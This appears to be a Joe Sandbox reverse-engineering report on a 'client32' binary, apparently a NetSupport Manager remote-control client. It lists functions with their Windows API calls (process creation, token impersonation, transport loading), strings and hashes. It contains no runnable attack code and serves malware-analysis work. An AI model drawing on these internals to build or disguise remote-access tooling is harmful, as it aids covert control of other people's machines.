Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
String ID:
API String ID: 1133104291-0
Opcode ID: 908bc2936078bc4c6ac962da95141eb810129409988ff1d577afad7bdf903408
Instruction ID: 7c250e45f4ac03af19e5549ffd659f7cf93bb24bbb5edd69f10158c5fc6d93cc
Opcode Fuzzy Hash: 908bc2936078bc4c6ac962da95141eb810129409988ff1d577afad7bdf903408
Instruction Fuzzy Hash: EE314F75941228BFDB14DFA5CD84FAEBBBCFB4C714F108159F914A3240D674AE018BA0

Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D3A1

Strings

AlreadyStarted, xrefs: 1100D365
NotFound, xrefs: 1100D37A
DllInitFailed, xrefs: 1100D357
BadParam, xrefs: 1100D381
CannotGetFunc, xrefs: 1100D35E
Exception, xrefs: 1100D388, 1100D396
RequiresVista, xrefs: 1100D349
AlreadyStopped, xrefs: 1100D36C
CannotLoadDll, xrefs: 1100D350
StillInstances, xrefs: 1100D38F
Unknown error %d, xrefs: 1100D397
NoCapClients, xrefs: 1100D373

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5

Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11027286
_strtok.LIBCMT ref: 110272C0
Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4

Strings

Client, xrefs: 11027276, 1102731B
UseNCS, xrefs: 110272DD
TCPIP, xrefs: 110272E2
Error. not all transports loaded (%d/%d), xrefs: 11027388
Retrying..., xrefs: 110273A2
LoadTransports(%d), xrefs: 110272FC
*max_sessions, xrefs: 11027316
Protocols, xrefs: 11027271

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92

Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110695BD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
GetTickCount.KERNEL32 ref: 11069621
wsprintfA.USER32 ref: 11069651
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7

Strings

CloseTransports slept for %u ms, xrefs: 11069630
..\ctl32\Connect.cpp, xrefs: 11069661
idata->n_connections=%d, xrefs: 1106964B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
API String ID: 2285713701-3017572385
Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94

Function 1100D690 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264

CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
_strrchr.LIBCMT ref: 1100D6EF
GetCurrentProcessId.KERNEL32 ref: 1100D6FF
wsprintfA.USER32 ref: 1100D720
_memset.LIBCMT ref: 1100D731
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
CloseHandle.KERNEL32(?,00000000), ref: 1100D781
CloseHandle.KERNEL32(?), ref: 1100D78A

Strings

%sNSSilence.exe %u %u, xrefs: 1100D71A
D, xrefs: 1100D75F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
String ID: %sNSSilence.exe %u %u$D
API String ID: 1760462761-4146734959
Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64

Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32(?), ref: 1100306D
GetStockObject.GDI32(00000007), ref: 11003089
SelectObject.GDI32(?,00000000), ref: 1100309A
SelectObject.GDI32(?,?), ref: 110030A7
InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
GetSysColor.USER32(00000004), ref: 110030EB
SetBkColor.GDI32(?,00000000), ref: 110030F6
Rectangle.GDI32(?,?,?,?,?), ref: 11003110
SelectObject.GDI32(?,?), ref: 1100311E
SelectObject.GDI32(?,?), ref: 11003128
DeleteObject.GDI32(?), ref: 1100312E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
String ID:
API String ID: 4121194973-0
Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0

Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1113F7AB
__CxxThrowException@8.LIBCMT ref: 1113F7C0
SetPropA.USER32(?,?,00000000), ref: 1113F84E
GetPropA.USER32(?), ref: 1113F85D
wsprintfA.USER32 ref: 1113F88F
RemovePropA.USER32(?), ref: 1113F8C1

Strings

NSMStatsWindow::m_aProp, xrefs: 1113F837
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 1113F889
UI.CPP, xrefs: 1113F811, 1113F832, 1113F8A2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 2013984029-1590351400
Opcode ID: d1e565686244c353336eb47f8c903c4bdfa7357e5d2a0cf1c96f8e279f79a4e6
Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
Opcode Fuzzy Hash: d1e565686244c353336eb47f8c903c4bdfa7357e5d2a0cf1c96f8e279f79a4e6
Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1

Function 110099B0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11009B95
_strtok.LIBCMT ref: 11009BD3
_malloc.LIBCMT ref: 11009BED

Strings

Send EV_CONFIGSET from %s@%d, xrefs: 11009D0A
Audio, xrefs: 11009B1C, 11009B36, 11009B7C, 11009CED
*extra_bytes, xrefs: 11009B77, 11009CE8
nbytes <= sizeof (extra_bytes), xrefs: 11009BB6
..\ctl32\AUDIO.CPP, xrefs: 11009BB1, 11009C00, 11009D05

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$_malloc
String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
API String ID: 665538724-3655815180
Opcode ID: 36a482367563f6e14ef27283e47c129ccab2542cb5b4f84f0fa0b71d1766c968
Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
Opcode Fuzzy Hash: 36a482367563f6e14ef27283e47c129ccab2542cb5b4f84f0fa0b71d1766c968
Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91

Function 11039A30 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 11039A4C
IsWindowEnabled.USER32(00000000), ref: 11039A53
_memset.LIBCMT ref: 11039A71
GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039AC3
GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 11039B2B
GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 11039B8E
GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 11039BF1
GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039CB7
GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039C54

Part of subcall function 111433D0: _strncpy.LIBCMT ref: 111433F4

Part of subcall function 11142E60: _strncpy.LIBCMT ref: 11142EA2

Strings

, xrefs: 11039CF1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Item$Text$_strncpy$EnabledWindow_memset
String ID:
API String ID: 3085755443-3916222277
Opcode ID: c221c43ba6b74d63792acc2dbfb1d4be52c5fadc535561d923381f6680cb7b8b
Instruction ID: 2910e5f8a593ae7bb755e0eb02a8607345b3e4930c222a88b89734f934e054df
Opcode Fuzzy Hash: c221c43ba6b74d63792acc2dbfb1d4be52c5fadc535561d923381f6680cb7b8b
Instruction Fuzzy Hash: 6B81B275A10716ABD724DB70CC85F96B3B9BF84B04F40C598E2499B281DFB1F945CBA0

Function 11013DD0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(?,NSM.LIC,00000000), ref: 11013DF9
GetUserDefaultLangID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110288C7), ref: 11013E0C
CloseHandle.KERNEL32(00000104), ref: 11013E1F
RevertToSelf.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110288C7), ref: 11013E25
GetUserDefaultUILanguage.KERNEL32(?,NSM.LIC,00000000), ref: 11013E94
GetUserDefaultLangID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110288C7), ref: 11013EA7

Part of subcall function 11001F80: FindWindowA.USER32(Progman,00000000), ref: 11001FA9
Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F

GetModuleFileNameA.KERNEL32(00000000,00000104,?), ref: 110140A4
wsprintfA.USER32 ref: 110140C4

Strings

Locales\%d\, xrefs: 110140BE
NSM.LIC, xrefs: 11013DE1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: User$Default$CloseHandleProcess$LangLanguageOpenWindow$FileFindImpersonateLoggedModuleNameRevertSelfThreadTokenVersionwsprintf
String ID: Locales\%d\$NSM.LIC
API String ID: 2347130047-4009933339
Opcode ID: 2d0a554713239b4e557b247888e6a654a7e9f052ff25caeb7d35d1d9a4342c35
Instruction ID: 2acfaa35145a1a697628cb8ecad6d28517b84db9e71122a5d147e1d325afb409
Opcode Fuzzy Hash: 2d0a554713239b4e557b247888e6a654a7e9f052ff25caeb7d35d1d9a4342c35
Instruction Fuzzy Hash: 0A51A3B6C0815681F623C936C65816D7FE8D700329F134ABAED4ADE2BED63DC9454252

Function 1103BD40 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 184COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103BDA7
GetUserNameA.ADVAPI32(?,?), ref: 1103BDCE

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

_fgets.LIBCMT ref: 1103BE6F
_free.LIBCMT ref: 1103BED6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

CloseHandle.KERNEL32(00000000), ref: 1103BFAC

Strings

IsA(), xrefs: 1103BE1B
P, xrefs: 1103BDC4
\Rewards.bin, xrefs: 1103BDE6
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103BE16
8zi, xrefs: 1103BD6D, 1103BD81, 1103BFB2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
